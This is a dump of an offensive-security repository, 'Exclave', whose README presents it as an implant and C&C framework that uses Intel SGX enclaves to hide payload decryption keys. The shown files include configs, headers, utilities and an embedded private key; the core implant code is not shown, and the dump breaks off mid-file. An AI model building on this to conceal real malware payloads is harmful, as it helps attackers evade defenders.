├── Server ├── sgx.pid ├── apps │ └── sgx.conf ├── server.conf ├── requirements.txt ├── keys │ ├── sgxRSApub.pem │ ├── server_cert.pem │ └── server_privkey.pem └── main.py ├── Enclave2 ├── enclave_types.h ├── Enclave2.config.xml ├── Enclave2.h ├── Enclave2_t.h ├── Enclave2.vcxproj.filters ├── Enclave2.edl ├── Enclave2_private.pem ├── Enclave2.cpp ├── Enclave2_t.c └── Enclave2.vcxproj ├── Docs ├── ExclaveArch.png └── Readme.md ├── Bridge ├── framework.h ├── pch.cpp ├── pch.h ├── Bridge.vcxproj.filters ├── Util.cpp ├── Enclave2_u.h ├── Bridge.h ├── Enclave2_u.c ├── Bridge.cpp └── Bridge.vcxproj ├── App ├── Util.hpp ├── base64.h ├── App.hpp ├── Util.cpp ├── App.vcxproj.filters ├── Enclave2_u.h ├── base64.cpp ├── Enclave2_u.c ├── obfuscate.h ├── App.cpp └── App.vcxproj ├── Readme.md ├── .gitattributes ├── .gitignore └── Enclave2.sln /Server/sgx.pid: -------------------------------------------------------------------------------- 1 | 35148 2 | -------------------------------------------------------------------------------- /Enclave2/enclave_types.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | -------------------------------------------------------------------------------- /Server/apps/sgx.conf: -------------------------------------------------------------------------------- 1 | # Root 2 | [/] 3 | tools.sessions.on = True -------------------------------------------------------------------------------- /Docs/ExclaveArch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsnezhkov/exclave/HEAD/Docs/ExclaveArch.png -------------------------------------------------------------------------------- /Bridge/framework.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 4 | // Windows Header Files 5 | #include 6 | -------------------------------------------------------------------------------- /Bridge/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to the pre-compiled header 2 | 3 | #include "pch.h" 4 | 5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed. 6 | -------------------------------------------------------------------------------- /App/Util.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | 8 | HINSTANCE importEBridge(LPCWSTR bridgeDll); 9 | VOID DumpHex(void* data, size_t size); 10 | VOID WriteBufFile(const char* fileName, const char* buf, size_t sz); 11 | -------------------------------------------------------------------------------- /App/base64.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifndef _BASE64_H_ 4 | #define _BASE64_H_ 5 | 6 | #include 7 | #include 8 | typedef unsigned char BYTE; 9 | 10 | std::string base64_encode(BYTE const* buf, unsigned int bufLen); 11 | std::vector base64_decode(std::string const&); 12 | 13 | #endif -------------------------------------------------------------------------------- /Server/server.conf: -------------------------------------------------------------------------------- 1 | # 2 | # Global server config 3 | # 4 | [global] 5 | server.socket_host = "192.168.88.21" 6 | server.socket_port = 8443 7 | #server.ssl_module = 'builtin' 8 | #server.ssl_certificate = "keys/server_cert.pem" 9 | #server.ssl_private_key = "keys/server_privkey.pem" 10 | log.access_file = "logs/access" 11 | log.error_file = "logs/error" -------------------------------------------------------------------------------- /Enclave2/Enclave2.config.xml: -------------------------------------------------------------------------------- 1 | 2 | 0 3 | 0 4 | 0x40000 5 | 0x100000 6 | 1 7 | 1 8 | 0 9 | 0 10 | 0xFFFFFFFF 11 | 12 | -------------------------------------------------------------------------------- /Bridge/pch.h: -------------------------------------------------------------------------------- 1 | // pch.h: This is a precompiled header file. 2 | // Files listed below are compiled only once, improving build performance for future builds. 3 | // This also affects IntelliSense performance, including code completion and many code browsing features. 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds. 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage. 6 | 7 | #ifndef PCH_H 8 | #define PCH_H 9 | 10 | // add headers that you want to pre-compile here 11 | #include "framework.h" 12 | 13 | #endif //PCH_H 14 | -------------------------------------------------------------------------------- /Server/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2020.12.5 2 | chardet==4.0.0 3 | cheroot==8.5.2 4 | CherryPy==18.6.0 5 | colorama==0.4.4 6 | hexdump==3.3 7 | httpie==2.4.0 8 | idna==2.10 9 | jaraco.classes==3.2.1 10 | jaraco.collections==3.2.0 11 | jaraco.functools==3.2.1 12 | jaraco.text==3.5.0 13 | more-itertools==8.7.0 14 | Naked==0.1.31 15 | portend==2.7.1 16 | pyasn1==0.4.8 17 | pycryptodome==3.10.1 18 | Pygments==2.8.0 19 | PySocks==1.7.1 20 | pytz==2021.1 21 | pywin32==300 22 | PyYAML==5.4.1 23 | requests==2.25.1 24 | requests-toolbelt==0.9.1 25 | rsa==4.7.2 26 | shellescape==3.8.1 27 | six==1.15.0 28 | tempora==4.0.1 29 | urllib3==1.26.3 30 | zc.lockfile==2.0 31 | -------------------------------------------------------------------------------- /Server/keys/sgxRSApub.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAlhvXhV796cjFn2ORhJ7A 3 | aRy/xkRbJZkMAm735bBMHRyLapqXIdy3dbY0Bdje11iqrzBC54BVbulUjF6IOY0q 4 | TnzvzLjT7UO88hElJdt+yt9tPz8KaBSX74ctYECfJrNsZ2L6EPzkyeW/bPMJanKx 5 | sde1mfpOKFB65pWBfxP35xXfNwUh4wXgsiBbOBeYBFVe09JMmkI4ZLe+36zsLfNM 6 | PUogbM/6GHsnKBPaA8h+nU/9VDBX2Efi0g+qUum9dui+xvIgUGrsTcNDNAG9m3jR 7 | +eOadUCNIa2CjChOCZAkXC6TOeCOYlASslGwg1DHIM5wKzXAxLsEfgyvYaz7d+6x 8 | fL2sqlLyRpiIVsby5y1xTp5wQ3BGygd+TIlxewNxQV1q2sS0DoQLRnc+TyS1nXMq 9 | xswd/Q45EQa99bZBksoC9bfWU/b4+QoKOxuJK/jQ9vkwtgwmoX/wQZpm2tTk6Aew 10 | wNdFoJbsRDR9UXTfdrxfN/SllC7Ro4cbU6LzEY1diTV3AgMBAAE= 11 | -----END PUBLIC KEY----- -------------------------------------------------------------------------------- /Enclave2/Enclave2.h: -------------------------------------------------------------------------------- 1 | #ifndef _ENCLAVE2_H_ 2 | #define _ENCLAVE2_H_ 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | #ifndef TRUE 9 | # define TRUE 1 10 | #endif 11 | 12 | #ifndef FALSE 13 | # define FALSE 0 14 | #endif 15 | 16 | const int sym_shared_key_size = SGX_AESGCM_KEY_SIZE; 17 | 18 | #if defined(__cplusplus) 19 | extern "C" { 20 | #endif 21 | 22 | #if defined(__cplusplus) 23 | } 24 | #endif 25 | 26 | sgx_status_t createRsaKeyPair(sgx_rsa3072_public_key_t* public_key, sgx_rsa3072_key_t* private_key, void** public_key_raw, void** private_key_raw); 27 | unsigned char* storeSymKey(unsigned char* encryptedData, size_t encryptedDataSize); 28 | unsigned char* decryptPayload(unsigned char* encryptedData, size_t encryptedDataSize, unsigned char* mac); 29 | 30 | void DumpHex(const void* data, size_t size); 31 | 32 | #endif /* !_ENCLAVE2_H_ */ 33 | -------------------------------------------------------------------------------- /App/App.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef _APP_H_ 3 | #define _APP_H_ 4 | 5 | 6 | #include "httplib.h" 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | #include "json.hpp" 19 | #include "base64.h" 20 | #include "obfuscate.h" 21 | 22 | 23 | #ifndef TRUE 24 | # define TRUE 1 25 | #endif 26 | 27 | #ifndef FALSE 28 | # define FALSE 0 29 | #endif 30 | 31 | #define PUB_KEY_MOD_SIZE 384 32 | #define PUB_KEY_EXP_SIZE 4 33 | #define PUB_KEY_STRUCT_SIZE (PUB_KEY_MOD_SIZE + PUB_KEY_EXP_SIZE) 34 | 35 | template 36 | T checkInvoke(HINSTANCE& dllHandle, char* funcName); 37 | 38 | typedef UINT64(__cdecl* initEnclave)(char* enclaveSignedFile); 39 | typedef int(__cdecl* genPair)(UINT64 eid, char** public_key_struct); 40 | typedef int(__cdecl* storeSymKey)(UINT64 eid, unsigned char* encData); 41 | typedef int(__cdecl* decryptPayload)(UINT64 eid, unsigned char* encData, size_t encDataSz, unsigned char* mac); 42 | typedef int(__cdecl* destageEnclave)(UINT64 eid); 43 | 44 | 45 | #endif /* !_ENCLAVE2_H_ */ 46 | -------------------------------------------------------------------------------- /Server/keys/server_cert.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDQzCCAiugAwIBAgIUJtOq89zcsEbrDYBUJrrSPzDfQPAwDQYJKoZIhvcNAQEL 3 | BQAwMTESMBAGA1UEAwwJbG9jYWxob3N0MQ4wDAYDVQQKDAVYLVNHWDELMAkGA1UE 4 | BhMCVVMwHhcNMjEwMzAzMjMyMjM1WhcNMjIwMzAzMjMyMjM1WjAxMRIwEAYDVQQD 5 | DAlsb2NhbGhvc3QxDjAMBgNVBAoMBVgtU0dYMQswCQYDVQQGEwJVUzCCASIwDQYJ 6 | KoZIhvcNAQEBBQADggEPADCCAQoCggEBAMaZkhdsXXKQn8jvQBZdKbul9K9uJd7U 7 | 8htXQuwGz9NkP4zp8fCQ59ed/JjaaGWfH/OrjDqLZiV5iPDzWLpvKbLyXlfzoiwr 8 | 7IhzguIgFox2TNV7VHQM9f3ir/m3kUbkEEeJx5uAFC/cuiTqZ3karj65MmSN4DpA 9 | GHiUnRliZnKe0cwCwvDYWmzqW+ruU1aSdaRSvDDwZDLhPfoLDQNd2AfiWZWT/3PZ 10 | 4Pe16/YdLHDtpJrGXFYTxZA810dZ6ShZCkebo4CMfMeiw3ePZOrxK8mAP0u9VHRC 11 | MOFIQiTd/VLE+pcnTG90qpw9Ek2f2N6dz4J2gTLpAsNlm93mg65B2RcCAwEAAaNT 12 | MFEwHQYDVR0OBBYEFEfctZeArwR8LpOfGxMWafYV3t3/MB8GA1UdIwQYMBaAFEfc 13 | tZeArwR8LpOfGxMWafYV3t3/MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEL 14 | BQADggEBAEVuNB4rQDf5rsN8gHYYgKxvG1QZo3/eI3agK/JmciksvR2s0WScDJBt 15 | R9D2SlP1Wffp5lFgVnC2G9US0WViinLYDE0jFiw2P2VaxM13rPCSIo5ppMCOSQAA 16 | 7HcOTbYipOCDVdAW+YWuLOCC1WRx2P8fqDFnRRrfit266JsaysUtskJ/So4AJxSn 17 | FRDx6u1zqrvk3tKrT5y8Iw2FMT2e9rBldMMBZQa+6A55pIyg5T4IBdq16RoR2q46 18 | HMyqXi7M0Gia3OohPx/diSvS8fDtWj/rpJBJJP+DlEht9JLWZiCxHonyfnuCcPn4 19 | AESZkEEmmn8rpYBFrEDPqIv+eBOgefs= 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /Enclave2/Enclave2_t.h: -------------------------------------------------------------------------------- 1 | #ifndef ENCLAVE2_T_H__ 2 | #define ENCLAVE2_T_H__ 3 | 4 | #include 5 | #include 6 | #include 7 | #include "sgx_edger8r.h" /* for sgx_ocall etc. */ 8 | 9 | 10 | #define SGX_CAST(type, item) ((type)(item)) 11 | 12 | #ifdef __cplusplus 13 | extern "C" { 14 | #endif 15 | 16 | int ecall_do_trusted(int check); 17 | void createRsaKeyPairEcall(char* public_key_raw_out, char* public_key_out); 18 | void storeSymKeyEcall(unsigned char* encrypted_payload, size_t encrypted_payload_len); 19 | void decryptPayloadEcall(unsigned char* encrypted_payload, size_t encrypted_payload_len, unsigned char* mac); 20 | int ecall_do_trusted_inside_ocall(void); 21 | 22 | sgx_status_t SGX_CDECL ocall_print(const char* str); 23 | sgx_status_t SGX_CDECL sgx_oc_cpuidex(int cpuinfo[4], int leaf, int subleaf); 24 | sgx_status_t SGX_CDECL sgx_thread_wait_untrusted_event_ocall(int* retval, const void* self); 25 | sgx_status_t SGX_CDECL sgx_thread_set_untrusted_event_ocall(int* retval, const void* waiter); 26 | sgx_status_t SGX_CDECL sgx_thread_setwait_untrusted_events_ocall(int* retval, const void* waiter, const void* self); 27 | sgx_status_t SGX_CDECL sgx_thread_set_multiple_untrusted_events_ocall(int* retval, const void** waiters, size_t total); 28 | 29 | #ifdef __cplusplus 30 | } 31 | #endif /* __cplusplus */ 32 | 33 | #endif 34 | -------------------------------------------------------------------------------- /App/Util.cpp: -------------------------------------------------------------------------------- 1 | #include "Util.hpp" 2 | 3 | HINSTANCE importEBridge(LPCWSTR bridgeDll) { 4 | 5 | HINSTANCE hinstLib; 6 | 7 | // Get a handle to the DLL module. 8 | hinstLib = LoadLibrary(bridgeDll); 9 | 10 | if (hinstLib != NULL) 11 | return hinstLib; 12 | else 13 | return NULL; 14 | 15 | } 16 | 17 | void WriteBufFile(const char* fileName, const char* buf, size_t sz) { 18 | 19 | std::ofstream outfile(fileName, std::ofstream::binary); 20 | 21 | outfile.write(buf, sz); 22 | outfile.close(); 23 | } 24 | 25 | void DumpHex(void* data, size_t size) { 26 | char ascii[17]; 27 | size_t i, j; 28 | ascii[16] = '\0'; 29 | for (i = 0; i < size; ++i) { 30 | printf("%02X ", ((unsigned char*)data)[i]); 31 | if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { 32 | ascii[i % 16] = ((unsigned char*)data)[i]; 33 | } 34 | else { 35 | ascii[i % 16] = '.'; 36 | } 37 | if ((i + 1) % 8 == 0 || i + 1 == size) { 38 | printf(" "); 39 | if ((i + 1) % 16 == 0) { 40 | printf("| %s \n", ascii); 41 | } 42 | else if (i + 1 == size) { 43 | ascii[(i + 1) % 16] = '\0'; 44 | if ((i + 1) % 16 <= 8) { 45 | printf(" "); 46 | } 47 | for (j = (i + 1) % 16; j < 16; ++j) { 48 | printf(" "); 49 | } 50 | printf("| %s \n", ascii); 51 | } 52 | } 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /Readme.md: -------------------------------------------------------------------------------- 1 | # Exclave (offensive enclave system) 2 | 3 | Exclave project helps offload wrapping/unwrapping of offensive payloads with Intel SGX technology assist. 4 | 5 | Intel SGX runs trusted code in a protected processor memory, via secure enclave technology. 6 | The trusted code is by design devoid of syscalls, I/O or any communication to the outside world (Ring 3/Ring2), OS/VM hypervisors unless declared data is marshalled to and from trusted context via a hardware switch handoff under a specifically described contract. Essentially, the code has a split personality: half of it is trusted, the other half is untrusted. 7 | 8 | One idea was to stash offensive payloads in the trusted code. You cannot run payloads or interface with OS process memory from there by design but you can perform computation, such as storing sensitive data like keys, seal data and export it out into the wild (userland) in a processor specific manner (encrypted/sealed by the key flashed into the processor). 9 | 10 | So if we can stash data, one logical progression would be to also implement logic for key negotiation by the implant to the C&C in a manner that does not expose encryption keys in flight, memory or storage on the OS, _or expose encryption code itself outside the trusted enclave._ This, with minimal additional dependencies and crypto libraries to minimize footprint. 11 | 12 | Exclave Phase I is such a system, layering PKI negotiations for encryption keys with the SGX assist. The layering is done to also allow dynamic loads of enclave runtime management into implants. One such reference implementation of an implant and a C&C is presented here. 13 | -------------------------------------------------------------------------------- /Docs/Readme.md: -------------------------------------------------------------------------------- 1 | # Exclave (offensive enclave system) 2 | 3 | Exclave project helps offload wrapping/unwrapping of offensive payloads with Intel SGX technology assist. 4 | 5 | Intel SGX runs trusted code in a protected processor memory, via secure enclave technology. 6 | The trusted code is by design devoid of syscalls, I/O or any communication to the outside world (Ring 3/Ring2), OS/VM hypervisors unless declared data is marshalled to and from trusted context via a hardware switch handoff under a specifically described contract. Essentially, the code has a split personality: half of it is trusted, the other half is untrusted. 7 | 8 | One idea was to stash offensive payloads in the trusted code. You cannot run payloads or interface with OS process memory from there by design but you can perform computation, such as storing sensitive data like keys, seal data and export it out into the wild (userland) in a processor specific manner (encrypted/sealed by the key flashed into the processor). 9 | 10 | So if we can stash data, one logical progression would be to also implement logic for key negotiation by the implant to the C&C in a manner that does not expose encryption keys in flight, memory or storage on the OS, _or expose encryption code itself outside the trusted enclave._ This, with minimal additional dependencies and crypto libraries to minimize footprint. 11 | 12 | Exclave Phase I is such a system, layering PKI negotiations for encryption keys with the SGX assist. The layering is done to also allow dynamic loads of enclave runtime management into implants. One such reference implementation of an implant and a C&C is presented here. 13 | -------------------------------------------------------------------------------- /Server/keys/server_privkey.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEpAIBAAKCAQEAxpmSF2xdcpCfyO9AFl0pu6X0r24l3tTyG1dC7AbP02Q/jOnx 3 | 8JDn1538mNpoZZ8f86uMOotmJXmI8PNYum8psvJeV/OiLCvsiHOC4iAWjHZM1XtU 4 | dAz1/eKv+beRRuQQR4nHm4AUL9y6JOpneRquPrkyZI3gOkAYeJSdGWJmcp7RzALC 5 | 8NhabOpb6u5TVpJ1pFK8MPBkMuE9+gsNA13YB+JZlZP/c9ng97Xr9h0scO2kmsZc 6 | VhPFkDzXR1npKFkKR5ujgIx8x6LDd49k6vEryYA/S71UdEIw4UhCJN39UsT6lydM 7 | b3SqnD0STZ/Y3p3PgnaBMukCw2Wb3eaDrkHZFwIDAQABAoIBAQCaRNiy0T6Vq7oy 8 | /4Ys2Rl95h/31fwc6BVZH6OgbHornweukluZnzY4y0RYB/BoX/8V7P/0yiwCmDHD 9 | 2YPm7krZ8mNOtrYW0dfe9ruIo5xgZ9SvUCn+K8M6AEjqFaoIA0iSCXjAVfFYbIE8 10 | A8l0zUDlAD8g1QSEux1HLUoLWeByz4OasPt1iF6jFwfr/PpKy6Vq11buRYWIpNwp 11 | AGrunqtn97hmnatnQ2/l0ZFsJ/k+x+Rkj7ZqxSg1wlBYs3YxH8rsQAE55N2yqMyK 12 | l5J9HLaCC+X8CX6bOO2OC5Vix16ME9AV4wE3N6q/CVTy63cs5Dk4QTHlgScteLfM 13 | 9FeJoljBAoGBAPsaqUS8+tgJaBep7RVFYwK1FbeGhWap2/syInIfgEtRQi6TfL03 14 | usaGuEIfiIZznzjXUADPcCq3X2VxtvbS8Achf4vzM7ijn6jAk1W3ZvL/v8RbR9Fi 15 | lDql3hmiQMfl+xtJh32A3DbBDxQBdUdQbNNOPQ3S5DUDq+Ol0sHVZKyZAoGBAMp4 16 | 2Comkf9x0ngN44qqRMojsZgeW1y6MGH9VJTHsl+QDM5Ef84MLID//8d/rZVmrn40 17 | 2TTVNZUesMytcsHf1GePsoCfMrYQEN3pOwh6xSjsf31LBKKQqoSwjpvlfobuvOXA 18 | Yh76N6aSZ3s1ahm1zN0ViY6JVtP9zM1UwpJd0BEvAoGAMStiU9xxfhYxdNjIXO7u 19 | WVxeOUa1HopKUiDaD+DNPXJW9EnbFi4we6lrsT79e95uIjI/LzlvbF3l5zZiLmjV 20 | qX/MuvnPeetIW0ICV7mHBjRAN9Hr+TtFbUqHeBuGdd450nkOd+vgszQQoMk8Ts+X 21 | z7S1Tdyq5Rqn8PbKkzwW75kCgYBhYcgOVejIpNUm+v8i9YwKcSp80LT+n2qf5rlk 22 | qbvILL+MAfQ6hS5uiTJboLQ7dFyexQpnV9jitRUyDIZyaxZ9DOc859T7LjT+lqvX 23 | Az2K1lznRUqgadYp5cVhg/rcKT1ff61x2sUjb60n3GQAo6k5+J7lmHbTlXGInKjM 24 | vyRQ7wKBgQDBYk9xiWx3hnH1fd7BQIQ9i5jYHglh2fpD7sLgUIrvGh3gh3dOv9cJ 25 | 4SkSbpgB1UpoLPhuzis88XPBH9mtpZ2GYJcxB2aGfYD7locsy4mdhjytzbrsow9Q 26 | I/5gsK8n27/S6XEh9wgjhDGnYHYomf/YTvez3ec4i4vrB28lVaFn3Q== 27 | -----END RSA PRIVATE KEY----- 28 | -------------------------------------------------------------------------------- /Bridge/Bridge.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {1a801513-d2c9-4e91-aba9-86b3b97f4575} 18 | 19 | 20 | 21 | 22 | Generated Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | 32 | 33 | Header Files 34 | 35 | 36 | Generated Files 37 | 38 | 39 | 40 | 41 | Source Files 42 | 43 | 44 | -------------------------------------------------------------------------------- /Enclave2/Enclave2.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {12cfbce8-8521-4114-b830-2b2260e464d6} 6 | 7 | 8 | {c7f28dce-cbca-400b-9631-d6a73e126a00} 9 | cpp;c;edl;def; 10 | 11 | 12 | {9c899b85-ba20-46bc-98ba-88bf9bb8043b} 13 | h;hpp; 14 | 15 | 16 | {34dfbe7d-3c22-45cd-95ac-7f11b4d69449} 17 | rc;xml;pem; 18 | 19 | 20 | 21 | 22 | Generated Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | 29 | 30 | Generated Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | 37 | 38 | Resource Files 39 | 40 | 41 | 42 | 43 | Source Files 44 | 45 | 46 | 47 | 48 | Resource Files 49 | 50 | 51 | -------------------------------------------------------------------------------- /Bridge/Util.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void WriteBufFile(const char* fileName, char* buf, size_t sz) { 4 | 5 | std::ofstream outfile(fileName, std::ofstream::binary); 6 | 7 | outfile.write(buf, sz); 8 | outfile.close(); 9 | } 10 | 11 | void buf2hex(uint8_t* buf, unsigned int sz) { 12 | 13 | unsigned int i; 14 | for (i = 0; i < sz; i++) 15 | { 16 | printf("%02X", buf[i]); 17 | } 18 | printf("\n"); 19 | } 20 | 21 | void DumpHex(const void* data, size_t size) { 22 | char ascii[17]; 23 | size_t i, j; 24 | ascii[16] = '\0'; 25 | for (i = 0; i < size; ++i) { 26 | printf("%02X ", ((unsigned char*)data)[i]); 27 | if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { 28 | ascii[i % 16] = ((unsigned char*)data)[i]; 29 | } 30 | else { 31 | ascii[i % 16] = '.'; 32 | } 33 | if ((i + 1) % 8 == 0 || i + 1 == size) { 34 | printf(" "); 35 | if ((i + 1) % 16 == 0) { 36 | printf("| %s \n", ascii); 37 | } 38 | else if (i + 1 == size) { 39 | ascii[(i + 1) % 16] = '\0'; 40 | if ((i + 1) % 16 <= 8) { 41 | printf(" "); 42 | } 43 | for (j = (i + 1) % 16; j < 16; ++j) { 44 | printf(" "); 45 | } 46 | printf("| %s \n", ascii); 47 | } 48 | } 49 | } 50 | } 51 | 52 | int readBin(const char* bin_file_name, unsigned char** buffer) 53 | { 54 | 55 | size_t readed = 0; 56 | FILE* input = fopen(bin_file_name, "rb"); 57 | int file_size = 0; 58 | 59 | //get Filesize 60 | fseek(input, 0, SEEK_END); 61 | file_size = ftell(input); 62 | rewind(input); 63 | 64 | //Allocate memory for buffer 65 | *buffer = (unsigned char*)malloc(file_size); 66 | 67 | //Fill Buffer 68 | readed = fread(*buffer, file_size, 1, input); 69 | 70 | return 0; 71 | } -------------------------------------------------------------------------------- /App/App.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {190450d8-4247-4225-941b-137e9028507a} 18 | 19 | 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | Header Files 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | -------------------------------------------------------------------------------- /Bridge/Enclave2_u.h: -------------------------------------------------------------------------------- 1 | #ifndef ENCLAVE2_U_H__ 2 | #define ENCLAVE2_U_H__ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "sgx_edger8r.h" /* for sgx_status_t etc. */ 9 | 10 | 11 | #define SGX_CAST(type, item) ((type)(item)) 12 | 13 | #ifdef __cplusplus 14 | extern "C" { 15 | #endif 16 | 17 | #ifndef OCALL_PRINT_DEFINED__ 18 | #define OCALL_PRINT_DEFINED__ 19 | void SGX_UBRIDGE(SGX_NOCONVENTION, ocall_print, (const char* str)); 20 | #endif 21 | #ifndef SGX_OC_CPUIDEX_DEFINED__ 22 | #define SGX_OC_CPUIDEX_DEFINED__ 23 | void SGX_UBRIDGE(SGX_CDECL, sgx_oc_cpuidex, (int cpuinfo[4], int leaf, int subleaf)); 24 | #endif 25 | #ifndef SGX_THREAD_WAIT_UNTRUSTED_EVENT_OCALL_DEFINED__ 26 | #define SGX_THREAD_WAIT_UNTRUSTED_EVENT_OCALL_DEFINED__ 27 | int SGX_UBRIDGE(SGX_CDECL, sgx_thread_wait_untrusted_event_ocall, (const void* self)); 28 | #endif 29 | #ifndef SGX_THREAD_SET_UNTRUSTED_EVENT_OCALL_DEFINED__ 30 | #define SGX_THREAD_SET_UNTRUSTED_EVENT_OCALL_DEFINED__ 31 | int SGX_UBRIDGE(SGX_CDECL, sgx_thread_set_untrusted_event_ocall, (const void* waiter)); 32 | #endif 33 | #ifndef SGX_THREAD_SETWAIT_UNTRUSTED_EVENTS_OCALL_DEFINED__ 34 | #define SGX_THREAD_SETWAIT_UNTRUSTED_EVENTS_OCALL_DEFINED__ 35 | int SGX_UBRIDGE(SGX_CDECL, sgx_thread_setwait_untrusted_events_ocall, (const void* waiter, const void* self)); 36 | #endif 37 | #ifndef SGX_THREAD_SET_MULTIPLE_UNTRUSTED_EVENTS_OCALL_DEFINED__ 38 | #define SGX_THREAD_SET_MULTIPLE_UNTRUSTED_EVENTS_OCALL_DEFINED__ 39 | int SGX_UBRIDGE(SGX_CDECL, sgx_thread_set_multiple_untrusted_events_ocall, (const void** waiters, size_t total)); 40 | #endif 41 | 42 | sgx_status_t ecall_do_trusted(sgx_enclave_id_t eid, int* retval, int check); 43 | sgx_status_t createRsaKeyPairEcall(sgx_enclave_id_t eid, char* public_key_raw_out, char* public_key_out); 44 | sgx_status_t storeSymKeyEcall(sgx_enclave_id_t eid, unsigned char* encrypted_payload, size_t encrypted_payload_len); 45 | sgx_status_t decryptPayloadEcall(sgx_enclave_id_t eid, unsigned char* encrypted_payload, size_t encrypted_payload_len, unsigned char* mac); 46 | sgx_status_t ecall_do_trusted_inside_ocall(sgx_enclave_id_t eid, int* retval); 47 | 48 | #ifdef __cplusplus 49 | } 50 | #endif /* __cplusplus */ 51 | 52 | #endif 53 | -------------------------------------------------------------------------------- /App/Enclave2_u.h: -------------------------------------------------------------------------------- 1 | #ifndef ENCLAVE2_U_H__ 2 | #define ENCLAVE2_U_H__ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "sgx_edger8r.h" /* for sgx_status_t etc. */ 9 | 10 | 11 | #define SGX_CAST(type, item) ((type)(item)) 12 | 13 | #ifdef __cplusplus 14 | extern "C" { 15 | #endif 16 | 17 | #ifndef OCALL_PRINT_DEFINED__ 18 | #define OCALL_PRINT_DEFINED__ 19 | void SGX_UBRIDGE(SGX_NOCONVENTION, ocall_print, (const char* str)); 20 | #endif 21 | #ifndef SGX_OC_CPUIDEX_DEFINED__ 22 | #define SGX_OC_CPUIDEX_DEFINED__ 23 | void SGX_UBRIDGE(SGX_CDECL, sgx_oc_cpuidex, (int cpuinfo[4], int leaf, int subleaf)); 24 | #endif 25 | #ifndef SGX_THREAD_WAIT_UNTRUSTED_EVENT_OCALL_DEFINED__ 26 | #define SGX_THREAD_WAIT_UNTRUSTED_EVENT_OCALL_DEFINED__ 27 | int SGX_UBRIDGE(SGX_CDECL, sgx_thread_wait_untrusted_event_ocall, (const void* self)); 28 | #endif 29 | #ifndef SGX_THREAD_SET_UNTRUSTED_EVENT_OCALL_DEFINED__ 30 | #define SGX_THREAD_SET_UNTRUSTED_EVENT_OCALL_DEFINED__ 31 | int SGX_UBRIDGE(SGX_CDECL, sgx_thread_set_untrusted_event_ocall, (const void* waiter)); 32 | #endif 33 | #ifndef SGX_THREAD_SETWAIT_UNTRUSTED_EVENTS_OCALL_DEFINED__ 34 | #define SGX_THREAD_SETWAIT_UNTRUSTED_EVENTS_OCALL_DEFINED__ 35 | int SGX_UBRIDGE(SGX_CDECL, sgx_thread_setwait_untrusted_events_ocall, (const void* waiter, const void* self)); 36 | #endif 37 | #ifndef SGX_THREAD_SET_MULTIPLE_UNTRUSTED_EVENTS_OCALL_DEFINED__ 38 | #define SGX_THREAD_SET_MULTIPLE_UNTRUSTED_EVENTS_OCALL_DEFINED__ 39 | int SGX_UBRIDGE(SGX_CDECL, sgx_thread_set_multiple_untrusted_events_ocall, (const void** waiters, size_t total)); 40 | #endif 41 | 42 | sgx_status_t 